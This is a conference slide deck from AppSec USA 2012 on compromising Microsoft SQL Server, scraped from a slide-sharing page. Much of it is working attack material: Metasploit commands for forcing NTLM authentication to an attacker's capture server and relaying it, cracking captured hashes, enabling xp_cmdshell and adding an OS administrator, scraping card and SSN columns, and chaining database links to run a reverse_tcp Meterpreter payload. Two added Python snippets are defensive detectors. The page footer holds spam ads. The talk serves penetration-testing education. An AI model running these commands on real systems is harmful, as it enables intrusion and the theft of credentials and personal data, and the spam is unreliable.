SQL Server Exploitation, Escalation, and Pilfering
                                  AppSec USA 2012

Authors:
Antti Rantasaari
Scott Sutherland
Who are we?

Antti Rantasaari

Scott Sutherland (@_nullbind)

What we do…
• Security consultants at NetSPI
• Pentesters
   ‒ Network
   ‒ Web
   ‒ Thick
• Researchers, bloggers, etc
• Pinball enthusiasts
What are we going to cover?

1. Database entry points
2. Domain user → Database user
3. Database user → OS admin
4. OS admin → Database admin
5. Database admin → OS admin
6. Finding sensitive data
7. Escalation: Service accounts
8. Escalation: Database Link Crawling
9. Conclusions
Why target SQL Servers?

Pentest Goal = Data Access
• It’s deployed everywhere
• Very few “exploits”, but it’s commonly
  misconfigured
• Integrated with Windows and Active
  Directory authentication
• Easy and stable to exploit
Why develop Metasploit tools?

•   I suck at programming
•   Easy to use framework
•   Huge community support
•   Easy management of code (GitHub)
•   Easy distribution of code




http://www.metasploit.com/

https://github.com/rapid7/metasploit-framework
Let’s get started!
Entry Points: Summary
  Unauthenticated Options
  • SQL injections
  • Weak passwords

  Authenticated Options (usually)
  • Other database servers
  • Unencrypted connection strings:
     ‒ Files
     ‒ Registry
     ‒ Network
  • ODBC connections
  • Client tools (priv inheritance)
DOMAIN USER → DATABASE USER
Privilege Inheritance
Privilege Inheritance: Summary

The "Domain Users" group is often granted privileges to log in to SQL Servers…

Evil users just need to:
• Find SQL Servers
• Verify Access
• Attack!
Privilege Inheritance: Find SQL Servers

 Easy SQL Server Discovery = SQLPing v3.0




   http://www.sqlsecurity.com/dotnetnuke/uploads/sqlping3.zip
Privilege Inheritance: Find SQL Servers

      Finding SQL Servers with osql:
Privilege Inheritance: Verify Access
Test the current user's access to SQL Servers with osql:

FOR /F "tokens=*" %i in ('type sqlservers.txt') do osql -E -S %i -Q "select 'I have access to:'+@@servername"
Privilege Inheritance: Verify Access
Test an alternative user's access to the SQL Servers with the mssql_sql Metasploit module:
msfconsole
use auxiliary/admin/mssql/mssql_sql
set RHOST <IP RANGE>
set RPORT <port>
set USE_WINDOWS_AUTHENT true
set DOMAIN <domain>
set USERNAME <user>
set PASSWORD <password>
set SQL <query>
run

       http://www.metasploit.com/modules/auxiliary/admin/mssql/mssql_sql
DATABASE USER → OS ADMIN
SMB Capture/Relay
SMB Capture/Relay: Summary
 SQL Server supports functions that can access files via UNC
 paths using the privileges of the SQL Server service account.

 High level authentication process:
SMB Capture/Relay: Summary

  Stored procedures with UNC support:
      ‒ *xp_dirtree
      ‒ *xp_fileexist
      ‒ xp_getfiledetails

  Possible SMB authentication attacks:

  Service Account        Network Communication   SMB Capture   SMB Relay
  LocalSystem            Computer Account        Yes           No
  NetworkService         Computer Account        Yes           No
  *Local Administrator   Local Administrator     Yes           Yes
  *Domain User           Domain User             Yes           Yes
  *Domain Admin          Domain Admin            Yes           Yes

   http://erpscan.com/press-center/smbrelay-bible-2-smbrelay-by-ms-sql-server/
http://www.netspi.com/blog/2010/07/01/invisible-threats-insecure-service-accounts/
SMB Capture: Diagram
SMB Capture: Start Sniffing for Hashes

 Start Metasploit SMB capture module on your
 evil server to capture seeded password hashes:
  msfconsole
  use auxiliary/server/capture/smb
  set CAINPWFILE /root/cain_hashes.txt
  set JOHNPWFILE /root/john_hashes.txt
  exploit




     http://www.metasploit.com/modules/auxiliary/server/capture/smb
http://www.packetstan.com/2011/03/nbns-spoofing-on-your-way-to-world.html
SMB Capture: Force MS SQL to Auth

Force SQL Server to authenticate with the modules:
MSSQL_NTLM_STEALER or MSSQL_NTLM_STEALER_SQLI

msfconsole
use auxiliary/admin/mssql/mssql_ntlm_stealer
set USE_WINDOWS_AUTHENT true
set DOMAIN <domain>
set USERNAME <user>
set PASSWORD <password>
set RHOSTS <IP RANGE>
set RPORT <port>
set SMBPROXY <evil server>
run
SMB Capture: Obtain Seeded Hashes

 Obtaining service account hashes from the SQL
 Server should look something like this:
  DOMAIN: DEMO
  USER: serviceaccount

  LMHASH:5e17a06b538a42ae82273227fd61a5952f85252cc731bb25

  NTHASH:763aa16c6882cb1b99d40dfc337b69e7e424d6524a91c03e




SMB Capture: Crack Hashes

 1. Crack the first half of the recovered LANMAN hash with the seeded half-LM rainbow tables:
        rcracki_mt -h 5e17a06b538a42ae ./halflmchall

 2. Crack the second half with John the Ripper to obtain the case-sensitive NTLM password:
        perl netntlm.pl --seed GPP4H1 --file /root/john_hashes.txt



SMB Relay: Diagram

Very high level overview:




          http://en.wikipedia.org/wiki/SMBRelay
SMB Relay: Setup SMBProxy for Relay

SMB Relay to 3rd Party with the SMB_Relay
Metasploit exploit module:
msfconsole
use exploit/windows/smb/smb_relay
set SMBHOST <targetserver>
exploit

If the service account has the local admin
privileges on the remote system, then a shell
will be returned by the smb_relay module


 http://www.metasploit.com/modules/exploit/windows/smb/smb_relay
SMB Relay: Force MS SQL to Auth

Force SQL Server to authenticate with the modules
MSSQL_NTLM_STEALER or MSSQL_NTLM_STEALER_SQLI
msfconsole
use auxiliary/admin/mssql/mssql_ntlm_stealer
set USE_WINDOWS_AUTHENT true
set DOMAIN <domain>
set USERNAME <user>
set PASSWORD <password>
set RHOSTS <IP RANGE>
set RPORT <port>
set SMBPROXY <evil server>
 run
SMB Relay: Get Meterpreter Shells
SMB Capture/Relay: Using PW or Shell

If Meterpreter, then:
• Type: shell
• Type: osql -E -Q "whatever you want"

If password:
• Sign in via RDP
• Open a cmd console
• osql -E -Q "whatever you want"
DEMO
Do a crazy dance!




BALLET = NOT CRAZY   DANCING FLY = TOTALLY CRAZY
OS ADMIN → DATABASE ADMIN
SQL Server Local Authorization Bypass
Local Auth Bypass: Summary

How can we go from OS admin to DB
admin?
• SQL Server 2000 to 2008
  ‒ LocalSystem = Sysadmin privileges


• SQL Server 2012
  ‒ Must migrate to SQL Server service process
    for Sysadmin privileges
Local Auth Bypass: Summary

Transparent Encryption = Mostly Useless
(unless local hard drive encryption is in place and key management is done correctly)
Local Auth Bypass: Psexec

On SQL Server 2000 to 2008
Execute queries as sysadmin with osql:
psexec -s cmd.exe
osql -E -S "localhost\sqlexpress" -Q "select is_srvrolemember('sysadmin')"

Execute queries as sysadmin with SSMS:
psexec -i -s ssms



    http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx
Local Auth Bypass: Get Shell

Obtain Meterpreter shell using the PSEXEC module
msfconsole
use exploit/windows/smb/psexec
set RHOST <targetserver>
set SMBDOMAIN .
set SMBUSER <user>
set SMBPASS <password>
exploit




  http://www.metasploit.com/modules/exploit/windows/smb/psexec
Local Auth Bypass: Get Sysadmin

Create a sysadmin in the database using the Metasploit mssql_local_auth_bypass post module:

In Meterpreter type "background" to return to msfconsole. Then, in the msfconsole, type:
use post/windows/manage/mssql_local_auth_bypass
set session <session>
set DB_USERNAME <username>
set DB_PASSWORD <password>
exploit



http://www.metasploit.com/modules/post/windows/manage/mssql_local_auth_bypass
SQL Server Auth Bypass: Got Sysadmin
Do a crazy whale dance!




To the left…   To the right…   Now dive!
DATABASE ADMIN → OS ADMIN
xp_cmdshell
XP_CMDSHELL: Summary

XP_CMDSHELL = OS COMMAND EXEC

Yes. We know you already know this, but don't forget…
XP_CMDSHELL: Re-Install

Re-install xp_cmdshell
EXEC master..sp_addextendedproc 'xp_cmdshell', 'C:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll';
XP_CMDSHELL: Re-Enable

Re-enable xp_cmdshell
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
GO

EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
GO
XP_CMDSHELL: Execute Commands

Add a local OS administrator with xp_cmdshell

EXEC master..xp_cmdshell 'net user myadmin MyP@sword1 /add'

EXEC master..xp_cmdshell 'net localgroup administrators myadmin /add'
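A detection-side counterpart to the techniques in the SMB capture and xp_cmdshell slides (file procedures pointed at UNC paths, re-installing or re-enabling xp_cmdshell, running commands through it, and nested openquery calls), as an added example that is not part of the original slides: a small Python classifier run over SQL Server audit rows. The rule names and the sample rows are constructed for the example.

```python
import re

# Constructed sample audit rows (login, statement text) for the example; not real traffic.
SAMPLE_EVENTS = [
    ("DEMO\\webapp", "EXEC master..xp_dirtree '\\\\10.0.0.5\\share'"),
    ("DEMO\\webapp", "EXEC master..xp_dirtree 'C:\\Windows\\Temp'"),
    ("sa", "EXEC master..sp_addextendedproc 'xp_cmdshell', 'xplog70.dll'"),
    ("sa", "sp_configure 'xp_cmdshell', 1; reconfigure;"),
    ("sa", "EXEC master..xp_cmdshell 'net user myadmin MyP@sword1 /add'"),
    ("DEMO\\report", "SELECT srvname FROM openquery(DB1,'SELECT srvname FROM "
                     "openquery(HVA,''SELECT srvname FROM master..sysservers'')')"),
    ("DEMO\\report", "SELECT name FROM sys.tables"),
]

# Patterns taken from the techniques shown in the deck.
UNC_PATH = re.compile(r"\\\\[\w.-]+\\")                       # \\host\share...
FILE_PROCS = re.compile(r"\bxp_(dirtree|fileexist|getfiledetails)\b", re.I)
REINSTALL = re.compile(r"\bsp_addextendedproc\b.*\bxp_cmdshell\b", re.I | re.S)
ENABLE = re.compile(r"\bsp_configure\b\s*N?['\"]?xp_cmdshell['\"]?\s*,\s*1\b", re.I)
CMDSHELL = re.compile(r"\bxp_cmdshell\b", re.I)
OPENQUERY = re.compile(r"\bopenquery\s*\(", re.I)
LINK_ENUM = re.compile(r"\bsysservers\b|\bsp_linkedservers\b", re.I)


def classify(stmt):
    """Return the names of the rules a single statement matches (empty list = clean)."""
    hits = []
    # File procedures are only interesting when pointed at a UNC path: that is what
    # makes the service account authenticate to a remote host over SMB.
    if FILE_PROCS.search(stmt) and UNC_PATH.search(stmt):
        hits.append("unc_file_proc")
    if REINSTALL.search(stmt):
        hits.append("xp_cmdshell_reinstall")
    elif ENABLE.search(stmt):
        hits.append("xp_cmdshell_enable")
    elif CMDSHELL.search(stmt):
        hits.append("xp_cmdshell_exec")
    depth = len(OPENQUERY.findall(stmt))
    if depth >= 2:                      # openquery inside openquery: link chaining
        hits.append("linked_server_chain")
    if depth >= 1 and LINK_ENUM.search(stmt):
        hits.append("linked_server_enum")
    return hits


def scan(events):
    """Return [(login, rule_names)] for every event that matches at least one rule."""
    findings = []
    for login, stmt in events:
        rules = classify(stmt)
        if rules:
            findings.append((login, rules))
    return findings


if __name__ == "__main__":
    for login, rules in scan(SAMPLE_EVENTS):
        print(f"{login:14} {', '.join(rules)}")
```

A local path passed to xp_dirtree is left alone on purpose; only the UNC form forces the service account to authenticate elsewhere.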
FINDING DATA
Finding Data: Summary

GOAL = Find sensitive data!

•   Credit cards

•   Social security number

•   Medical records
Finding Data: TSQL Script

Simple keywords search via TSQL!
EXEC master..sp_msforeachdb
'SELECT @@Servername as Server_Name,''[?]'' as
Database_name,Table_Name,Column_Name
FROM [?].INFORMATION_SCHEMA.COLUMNS WHERE
Column_Name LIKE ''%password%''
OR Column_Name LIKE ''%Credit%''
OR Column_Name LIKE ''%CCN%''
OR Column_Name LIKE ''%Account%''
OR Column_Name LIKE ''%Social%''
OR Column_Name LIKE ''%SSN%''
ORDER BY Table_name'
Finding Data: Metasploit Module

Database scraping with the
mssql_findandsampledata module!

Features
• Scan multiple servers
• Authenticate with local Windows, Domain
   or SQL credentials
• Sample data
• Number of records found
• Output to screen and CSV file

http://www.metasploit.com/modules/auxiliary/admin/mssql/mssql_findandsampledata
Finding Data: Metasploit Module

Launching mssql_findandsampledata:
msfconsole
use auxiliary/admin/mssql/mssql_findandsampledata
set RHOSTS <range>
set RPORT <port>
setg USE_WINDOWS_AUTHENT true
setg DOMAIN <CompanyDomain>
set USERNAME <username>
set PASSWORD <password>
set SAMPLE_SIZE <size>
set KEYWORDS credit|social|password
exploit
Finding Data: Module Output
Finding Data: Demo




          DEMO
Do a crazy cat disco dance!
Escalation: Service Accounts
Shared Service Accounts: Summary

XP_CMDSHELL + Shared Service Accounts + OSQL -E = (more) Unauthorized DATA access
Shared Service Accounts: Diagram
Shared Service Accounts: TSQL Script

XP_CMDSHELL + OSQL = MORE ACCESS!

EXEC master..xp_cmdshell 'osql -E -S HVA -Q "select super.secret.data"'

More examples:
http://www.netspi.com/blog/2011/07/19/when-databases-attack-hacking-with-the-osql-utility/
Escalation: Database Link Crawling
Database Link Crawling: Summary

Database Links
• Allow one database server to query another
• Often configured with excessive privileges
• Can be chained together
• Use openquery() to query linked servers
• Can be used to execute the infamous
  xp_cmdshell
• Tons of access, no credentials required (via SQL
  injection)
Database Link Crawling: Diagram
Database Link Crawling: List Links

How do I list linked servers?
Two common options:
sp_linkedservers
and
SELECT srvname FROM master..sysservers
Database Link Crawling: List Links

How do I list linked servers on a linked server?
SELECT srvname FROM openquery(DB1, 'SELECT srvname FROM master..sysservers')
Database Link Crawling: List Links

How do I list linked servers on the linked
server’s linked server?
SELECT srvname FROM openquery(DB1,'SELECT srvname FROM openquery(HVA,''SELECT srvname FROM master..sysservers'')')
Database Link Crawling: You Get it!

...You get the point.

You can follow links until you run out.
Database Link Crawling: Exec Cmds

How do I run commands on a linked server?

SELECT * FROM openquery(DB1,'SELECT * FROM openquery(HVA,''SELECT 1;exec xp_cmdshell ''''ping 192.168.1.1'''' '')')
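The chaining described on the link-crawling slides, turned into a defender's attack-surface check, as an added example that is not part of the presenters' modules: given a link inventory exported from each server's sys.servers and sys.linked_logins (the LINKS rows here are constructed), it walks the link graph from a chosen entry point and reports which servers a chain reaches and whether the final hop lands with sysadmin. It assumes, as a simplification, that any login able to query a server can use every link that server exposes.

```python
from collections import deque

# Constructed link inventory for the example, in the shape a defender would export
# from each server's sys.servers / sys.linked_logins:
# (source server, linked server, remote login used by the link, remote login is sysadmin?)
LINKS = [
    ("WEB01",   "DB1",     "sa",       True),
    ("DB1",     "HVA",     "linkuser", True),
    ("DB1",     "REPORTS", "reader",   False),
    ("HVA",     "DB1",     "sa",       True),    # link back to DB1: a cycle
    ("REPORTS", "ARCHIVE", "reader",   False),
]


def build_graph(links):
    """Adjacency list: source -> [(target, remote_login, is_sysadmin), ...]."""
    graph = {}
    for src, dst, login, is_sa in links:
        graph.setdefault(src, []).append((dst, login, is_sa))
    return graph


def crawl(links, start):
    """Breadth-first crawl of the link graph from `start`.

    Returns {server: (path, sysadmin)} for every server reachable through one or
    more links. `path` is one chain of hops that reaches it; `sysadmin` is True if
    some reachable server links to it with a sysadmin-mapped remote login, which is
    the case where xp_cmdshell (and everything else) is available on that server.
    Cycles are handled by the `found` bookkeeping, so the crawl always terminates.
    """
    graph = build_graph(links)
    found = {}
    queue = deque([(start, [start])])
    while queue:
        server, path = queue.popleft()
        for dst, _login, is_sa in graph.get(server, []):
            if dst == start:
                continue
            new_path = path + [dst]
            if dst not in found:
                found[dst] = (new_path, is_sa)
                queue.append((dst, new_path))
            elif is_sa and not found[dst][1]:
                found[dst] = (new_path, True)    # a stronger hop to a known server
    return found


def sysadmin_reachable(links, start):
    """Servers where some chain starting at `start` ends on a sysadmin-mapped link."""
    return sorted(s for s, (_path, is_sa) in crawl(links, start).items() if is_sa)


def report(links, start):
    """One line per reachable server: the chain and the privilege it ends with."""
    lines = []
    for server, (path, is_sa) in sorted(crawl(links, start).items()):
        level = "sysadmin" if is_sa else "limited"
        lines.append(f"{' -> '.join(path)}: {level}")
    return lines


if __name__ == "__main__":
    print("\n".join(report(LINKS, "WEB01")))
```

Run it from every server a web application can reach; each entry point whose report contains a sysadmin line is a link that should be re-mapped to a low-privilege remote login.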
Database Link Crawling: Modules

Two Modules
1. Direct connection
2. SQL Injection

Available for Download
• Not submitted to Metasploit trunk – Yet
• Downloads available from nullbind’s github
  ‒ mssql_linkcrawler.rb
  ‒ mssql_linkcrawler_sqli.rb
Database Link Crawling: Modules

• Features
  ‒ Crawl SQL Server database links
  ‒ Standard Crawl output
  ‒ Verbose Crawl output
  ‒ Output to CSV file
  ‒ Supports 32 and 64 bit Windows
  ‒ Global Metasploit payload deployment
  ‒ Targeted Metasploit payload deployment
  ‒ Payload deployment via powershell memory
    injection
Metasploit Module: Run multi/handler

Setup the multi/handler module:
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 443
set ExitOnSession false
exploit -j -z
Metasploit Module: Link Crawler

Setup the mssql_linkcrawler_sqli module:
use exploit/windows/mssql/mssql_linkcrawler_sqli
set GET_PATH /employee.asp?id=1;[SQLi];--
set type blind
set RHOST 192.168.1.100
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.130
set lport 443
set DisablePayloadHandler true
exploit
Database Link Crawling: Attack!
Database Link Chaining: Demo




         DEMO
Do a crazy cat disco dance!




      Yes. It warrants 2 disco cats!
Database Link Chaining: Modules

Current Constraints
• Cannot crawl through SQL Server 2000
• Cannot enable xp_cmdshell through links
• Cannot deliver payloads to systems without
  powershell (at the moment)
• Currently, the module leaves a powershell
  process running on exit
• Currently, doesn’t allow arbitrary query
  execution on linked servers
Conclusions

Configure all accounts with LEAST PRIVILEGE:
  system accounts
  service accounts
  database accounts
  application accounts

Conclusions

Always VALIDATE INPUT:
  web apps
  thick apps
  mobile apps
  web services

Conclusions

Configure SMB SIGNING

Conclusions

Don't do DRUGS
Questions

Antti Rantasaari
Email: antti.rantasaari@netspi.com

Scott Sutherland
Email: scott.sutherland@netspi.com
Blog: http://www.netspi.com/blog/author/ssutherland/
Github: http://www.github.com/nullbind/
Twitter: @_nullbind


Presentation Slides
http://www.slideshare.net/nullbind/sql-serverexploitationescalationandpilferingapp-secusa2012

2017 OWASP SanFran March Meetup - Hacking SQL Server on Scale with PowerShell
 
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 201510 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
 
Attack All the Layers: What's Working during Pentests (OWASP NYC)
Attack All the Layers: What's Working during Pentests (OWASP NYC)Attack All the Layers: What's Working during Pentests (OWASP NYC)
Attack All the Layers: What's Working during Pentests (OWASP NYC)
 
Secure360 - Attack All the Layers! Again!
Secure360 - Attack All the Layers! Again!Secure360 - Attack All the Layers! Again!
Secure360 - Attack All the Layers! Again!
 
WTF is Penetration Testing v.2
WTF is Penetration Testing v.2WTF is Penetration Testing v.2
WTF is Penetration Testing v.2
 
Attack all the layers secure 360
Attack all the layers secure 360Attack all the layers secure 360
Attack all the layers secure 360
 
Declaration of malWARe
Declaration of malWAReDeclaration of malWARe
Declaration of malWARe
 
Thick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash CourseThick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash Course
 
Introduction to Windows Dictionary Attacks
Introduction to Windows Dictionary AttacksIntroduction to Windows Dictionary Attacks
Introduction to Windows Dictionary Attacks
 

Kürzlich hochgeladen

DBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDropbox
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businesspanagenda
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfsudhanshuwaghmare1
 
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot ModelMcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot ModelDeepika Singh
 
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Jeffrey Haguewood
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyKhushali Kathiriya
 
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamDEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamUiPathCommunity
 
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfRising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfOrbitshub
 
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...apidays
 
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...Zilliz
 
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodPolkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodJuan lago vázquez
 
FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024The Digital Insurer
 
Elevate Developer Efficiency & build GenAI Application with Amazon Q​
Elevate Developer Efficiency & build GenAI Application with Amazon Q​Elevate Developer Efficiency & build GenAI Application with Amazon Q​
Elevate Developer Efficiency & build GenAI Application with Amazon Q​Bhuvaneswari Subramani
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...DianaGray10
 
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...apidays
 
WSO2's API Vision: Unifying Control, Empowering Developers
WSO2's API Vision: Unifying Control, Empowering DevelopersWSO2's API Vision: Unifying Control, Empowering Developers
WSO2's API Vision: Unifying Control, Empowering DevelopersWSO2
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
Six Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal OntologySix Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal Ontologyjohnbeverley2021
 

Kürzlich hochgeladen (20)

DBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor Presentation
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot ModelMcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
 
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : Uncertainty
 
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamDEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
 
Understanding the FAA Part 107 License ..
Understanding the FAA Part 107 License ..Understanding the FAA Part 107 License ..
Understanding the FAA Part 107 License ..
 
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfRising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
 
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
 
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
 
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodPolkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
 
FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024
 
Elevate Developer Efficiency & build GenAI Application with Amazon Q​
Elevate Developer Efficiency & build GenAI Application with Amazon Q​Elevate Developer Efficiency & build GenAI Application with Amazon Q​
Elevate Developer Efficiency & build GenAI Application with Amazon Q​
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
 
WSO2's API Vision: Unifying Control, Empowering Developers
WSO2's API Vision: Unifying Control, Empowering DevelopersWSO2's API Vision: Unifying Control, Empowering Developers
WSO2's API Vision: Unifying Control, Empowering Developers
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Six Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal OntologySix Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal Ontology
 

SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012

  • 1. SQL Server Exploitation, Escalation, and Pilfering
     AppSec USA 2012
     Authors: Antti Rantasaari, Scott Sutherland

  • 2. Who are we?
     Antti Rantasaari
     Scott Sutherland (@_nullbind)
     What we do…
     • Security consultants at NetSPI
     • Pentesters
       ‒ Network
       ‒ Web
       ‒ Thick
     • Researchers, bloggers, etc
     • Pinball enthusiasts

  • 3. What are we going to cover?
     1. Database entry points
     2. Domain user → Database user
     3. Database user → OS admin
     4. OS admin → Database admin
     5. Database admin → OS admin
     6. Finding sensitive data
     7. Escalation: Service accounts
     8. Escalation: Database Link Crawling
     9. Conclusions

  • 4. Why target SQL Servers?
     Pentest Goal = Data Access
     • It’s deployed everywhere
     • Very few “exploits”, but it’s commonly misconfigured
     • Integrated with Windows and Active Directory authentication
     • Easy and stable to exploit

  • 5. Why develop Metasploit tools?
     • I suck at programming
     • Easy to use framework
     • Huge community support
     • Easy management of code (GitHub)
     • Easy distribution of code
     http://www.metasploit.com/
     https://github.com/rapid7/metasploit-framework

  • 7. Entry Points: Summary
     Unauthenticated Options
     • SQL injections
     • Weak passwords
     Authenticated Options (usually)
     • Other database servers
     • Unencrypted connection strings:
       ‒ Files
       ‒ Registry
       ‒ Network
     • ODBC connections
     • Client tools (priv inheritance)

  • 8. DOMAIN user → DATABASE user: Privilege Inheritance

  • 9. Privilege Inheritance: Summary
     The “Domain Users” group is often provided privileges to login into SQL Servers…
     Evil users just need to:
     • Find SQL Servers
     • Verify Access
     • Attack!

  • 10. Privilege Inheritance: Find SQL Servers
     Easy SQL Server Discovery = SQLPing v3.0
     http://www.sqlsecurity.com/dotnetnuke/uploads/sqlping3.zip

  • 11. Privilege Inheritance: Find SQL Servers
     Finding SQL Servers with osql:

  • 12. Privilege Inheritance: Verify Access
     Test current user’s access to SQL Servers with osql:
